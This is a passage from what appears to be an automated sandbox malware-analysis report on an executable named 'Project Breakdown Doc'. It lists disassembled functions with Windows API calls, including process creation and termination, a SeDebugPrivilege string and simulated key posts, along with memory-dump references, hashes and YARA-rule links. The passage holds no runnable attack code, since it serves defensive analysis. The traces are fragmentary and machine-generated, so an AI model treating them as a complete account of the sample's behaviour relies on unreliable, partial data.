                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C7CF95
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C7CFA3
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C7CFB8
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C7CFC0
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C7D04B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 074c266a334fd8e2a2de5152ba0c2f0f0413443ffd3a481d35813700baabdb48
                                                  • Instruction ID: 1bf4e3129e3b6b504acf0ec81cd39cd08c026315d1304ca7ed4a8da613c8f5e8
                                                  • Opcode Fuzzy Hash: 074c266a334fd8e2a2de5152ba0c2f0f0413443ffd3a481d35813700baabdb48
                                                  • Instruction Fuzzy Hash: 2A71A530500205DFCF21CF64CC85AAA7BB6FF49351F14826EFD6A9A2A6C7318D52DB60
                                                  Function 00CCC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                    • Part of subcall function 00C42344: GetCursorPos.USER32(?), ref: 00C42357
                                                    • Part of subcall function 00C42344: ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                    • Part of subcall function 00C42344: GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00CCC2E4
                                                  • ImageList_EndDrag.COMCTL32 ref: 00CCC2EA
                                                  • ReleaseCapture.USER32 ref: 00CCC2F0
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00CCC39A
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00CCC3AD
                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00CCC48F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 1924731296-2107944366
                                                  • Opcode ID: d71fcb1ceb86162bc2d1e443a5bcc58a42f11f65c2277a7ef38cff2c0e1e630b
                                                  • Instruction ID: b409711558bdce4f36a1addf75d79c66c34902cfa9a4aaf7c7c129023a9f3544
                                                  • Opcode Fuzzy Hash: d71fcb1ceb86162bc2d1e443a5bcc58a42f11f65c2277a7ef38cff2c0e1e630b
                                                  • Instruction Fuzzy Hash: AC518B70204304AFDB04EF24CC96F6A7BE5FB88314F04852DF5998B2E1CB70A959DB62
                                                  Function 00CB8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00CCF910), ref: 00CB903D
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00CCF910), ref: 00CB9071
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CB91EB
                                                  • SysFreeString.OLEAUT32(?), ref: 00CB9215
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 7586346c2f3bb77d5349ea67cd7eb5af8029cd33082c98620419b66427e16782
                                                  • Instruction ID: 0f9ecbf7e6b21391edd5778e5c4c656790be79c01fa9ddfa7a9debd8c88caa12
                                                  • Opcode Fuzzy Hash: 7586346c2f3bb77d5349ea67cd7eb5af8029cd33082c98620419b66427e16782
                                                  • Instruction Fuzzy Hash: 85F1F871A00119EFDB14DF94C888EEEB7B9FF49314F108059F616AB2A1DB31AE46DB50
                                                  Function 00CBF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CBF9C9
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFB5C
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFB80
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFBC0
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CBFBE2
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CBFD5E
                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CBFD90
                                                  • CloseHandle.KERNEL32(?), ref: 00CBFDBF
                                                  • CloseHandle.KERNEL32(?), ref: 00CBFE36
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                  • String ID:
                                                  • API String ID: 4090791747-0
                                                  • Opcode ID: 42bdd402921ac8255893e6c67e5db0d19b52c479efd91da77a9b73827ba1dc20
                                                  • Instruction ID: a4588425002f0db9fb5a733f38abc6f0175399316dfaeae2a087db82a0a09b2e
                                                  • Opcode Fuzzy Hash: 42bdd402921ac8255893e6c67e5db0d19b52c479efd91da77a9b73827ba1dc20
                                                  • Instruction Fuzzy Hash: F4E1A2312042419FCB24EF24C891BAABBE1FF85314F14856DF8999B3A2CB31DD46DB52
                                                  Function 00CA4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CA38D3,?), ref: 00CA48C7
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CA38D3,?), ref: 00CA48E0
                                                    • Part of subcall function 00CA4CD3: GetFileAttributesW.KERNEL32(?,00CA3947), ref: 00CA4CD4
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00CA4FE2
                                                  • _wcscmp.LIBCMT ref: 00CA4FFC
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA5017
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: e5998e881c2b7764b1811b06b5545f1cce6211fb051c245d8cf85433dce94b3c
                                                  • Instruction ID: 1c8fdbe4e2a37ebb22899e6187ac438e5a57f13f3369609fd951092b14a7ca63
                                                  • Opcode Fuzzy Hash: e5998e881c2b7764b1811b06b5545f1cce6211fb051c245d8cf85433dce94b3c
                                                  • Instruction Fuzzy Hash: D85197B24087859BC724DBA0CC819DFB3ECAF85345F00492EF299D3191EF74A28C9766
                                                  Function 00CC88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CC896E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 39a790a6e698ef5c326ce9a2c48193cc71de2f8e2544de20c83a5c3377e8c17a
                                                  • Instruction ID: 652ff205d5ab629869ef53ae9d75430b909ae3c8a794a7c686557c7d3b3f00e6
                                                  • Opcode Fuzzy Hash: 39a790a6e698ef5c326ce9a2c48193cc71de2f8e2544de20c83a5c3377e8c17a
                                                  • Instruction Fuzzy Hash: FE519130600209BFDF309F25CC89FAB7B65BB05320F60415AF525E66E1DF71AE98AB51
                                                  Function 00C42B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C7C547
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C7C569
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C7C581
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C7C59F
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C7C5C0
                                                  • DestroyIcon.USER32(00000000), ref: 00C7C5CF
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C7C5EC
                                                  • DestroyIcon.USER32(?), ref: 00C7C5FB
                                                    • Part of subcall function 00CCA71E: DeleteObject.GDI32(00000000), ref: 00CCA757
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: 1b2a1f7b989a2c7dbaf9f85072bd52435c221e7d9cf9930e3e8cec0f262f0dfa
                                                  • Instruction ID: fa33666dc6d865bba7ccad23d6454ea18b873d3da839b973ec0837c7f2d93e95
                                                  • Opcode Fuzzy Hash: 1b2a1f7b989a2c7dbaf9f85072bd52435c221e7d9cf9930e3e8cec0f262f0dfa
                                                  • Instruction Fuzzy Hash: 13514670600609AFDB24DF25CC86FAA7BB5FB58310F10452CF916972A0DB71EA91EB60
                                                  Function 00C99B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C9AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9AE77
                                                    • Part of subcall function 00C9AE57: GetCurrentThreadId.KERNEL32 ref: 00C9AE7E
                                                    • Part of subcall function 00C9AE57: AttachThreadInput.USER32(00000000,?,00C99B65,?,00000001), ref: 00C9AE85
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99B70
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C99B8D
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C99B90
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99B99
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C99BB7
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C99BBA
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C99BC3
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C99BDA
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C99BDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: 4db3386303cf0bb23b1866a3d34ede2121ec00ceee85fda89adb4aae6c8d658d
                                                  • Instruction ID: ed7f6e433af41381cffc063d9da651d4891df040921bf24c67d87b551bf59f21
                                                  • Opcode Fuzzy Hash: 4db3386303cf0bb23b1866a3d34ede2121ec00ceee85fda89adb4aae6c8d658d
                                                  • Instruction Fuzzy Hash: F211E171550218BFFB106B64DC8DF6E7B2EEB4C755F110429F244AB0A0C9F35C11DAA4
                                                  Function 00C98E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E0C
                                                  • HeapAlloc.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E13
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C98A84,00000B00,?,?), ref: 00C98E28
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E30
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E33
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C98A84,00000B00,?,?), ref: 00C98E43
                                                  • GetCurrentProcess.KERNEL32(00C98A84,00000000,?,00C98A84,00000B00,?,?), ref: 00C98E4B
                                                  • DuplicateHandle.KERNEL32(00000000,?,00C98A84,00000B00,?,?), ref: 00C98E4E
                                                  • CreateThread.KERNEL32(00000000,00000000,00C98E74,00000000,00000000,00000000), ref: 00C98E68
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 606d033a454a406ae17c6d23bdcfdc3dd0ebeaa87d8e792d31f2df67658ee303
                                                  • Instruction ID: cc34938e110ad3110d123568e238c4be7cf1730906d05570006c2d07b668992f
                                                  • Opcode Fuzzy Hash: 606d033a454a406ae17c6d23bdcfdc3dd0ebeaa87d8e792d31f2df67658ee303
                                                  • Instruction Fuzzy Hash: 9101A4B5240308FFEA10ABA5DC4DF6F7BADEB89711F044425FA05DB2A1CA70D8018A20
                                                  Function 00CB9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: d293cd979d9a47b6f0a839793435329e3d5eec9c3fa1259dac8aef4749d919ad
                                                  • Instruction ID: 9c820e7b9ea8d904d3de5b3118ef701a674012def402cb47b5487c6c464e7eb2
                                                  • Opcode Fuzzy Hash: d293cd979d9a47b6f0a839793435329e3d5eec9c3fa1259dac8aef4749d919ad
                                                  • Instruction Fuzzy Hash: 19918E71A00219ABDF24DFA5C848FEFBBB8EF45710F108159F615AB290D7709A45CFA0
                                                  Function 00CB9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C97652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?,?,00C9799D), ref: 00C9766F
                                                    • Part of subcall function 00C97652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C9768A
                                                    • Part of subcall function 00C97652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C97698
                                                    • Part of subcall function 00C97652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?), ref: 00C976A8
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00CB9B1B
                                                  • _memset.LIBCMT ref: 00CB9B28
                                                  • _memset.LIBCMT ref: 00CB9C6B
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00CB9C97
                                                  • CoTaskMemFree.OLE32(?), ref: 00CB9CA2
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00CB9CF0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: 88ed0eb8d58dc8bdf1c218f06d3896abc670125d62c974a6f232a203da26598e
                                                  • Instruction ID: 972760f102bc9eefb18943e6a1868cb8bf69f11df06ee46905ec48b2a5477f71
                                                  • Opcode Fuzzy Hash: 88ed0eb8d58dc8bdf1c218f06d3896abc670125d62c974a6f232a203da26598e
                                                  • Instruction Fuzzy Hash: 76913771D00229ABDF10DFA5DC85ADEBBB9FF08710F20416AF519A7281DB319A45DFA0
                                                  Function 00CC6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CC7093
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00CC70A7
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00CC70C1
                                                  • _wcscat.LIBCMT ref: 00CC711C
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CC7133
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CC7161
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 82cbc03b4913a74b6759e258b0102132843766c1c63e7834515f7134fc85cc63
                                                  • Instruction ID: 3996ad20d53a95c776079e494c5b3cb07e05d890add17892ea3d65a0417027ab
                                                  • Opcode Fuzzy Hash: 82cbc03b4913a74b6759e258b0102132843766c1c63e7834515f7134fc85cc63
                                                  • Instruction Fuzzy Hash: 60418071A04308ABDB219FA4CC85FEE77A9EF08350F10452EF598E7291D7719D859B60
                                                  Function 00CBEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00CA3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00CA3EB6
                                                    • Part of subcall function 00CA3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00CA3EC4
                                                    • Part of subcall function 00CA3E91: CloseHandle.KERNEL32(00000000), ref: 00CA3F8E
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBECB8
                                                  • GetLastError.KERNEL32 ref: 00CBECCB
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CBECFA
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CBED77
                                                  • GetLastError.KERNEL32(00000000), ref: 00CBED82
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CBEDB7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: d282d5cd8bb8b282d9e63f1d185a73bfaf6a37d61f9b44f0fa6ecc1dd5257017
                                                  • Instruction ID: 233c25b59b1700c3b2e8d3bf8dafbdbe95a06c5a5b7fe986f317c62837bb5a95
                                                  • Opcode Fuzzy Hash: d282d5cd8bb8b282d9e63f1d185a73bfaf6a37d61f9b44f0fa6ecc1dd5257017
                                                  • Instruction Fuzzy Hash: 3441DF702002119FDB14EF24CC95FAEB7A1EF80B14F18841DF8429B3D2CBB4A905EB96
                                                  Function 00CA3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
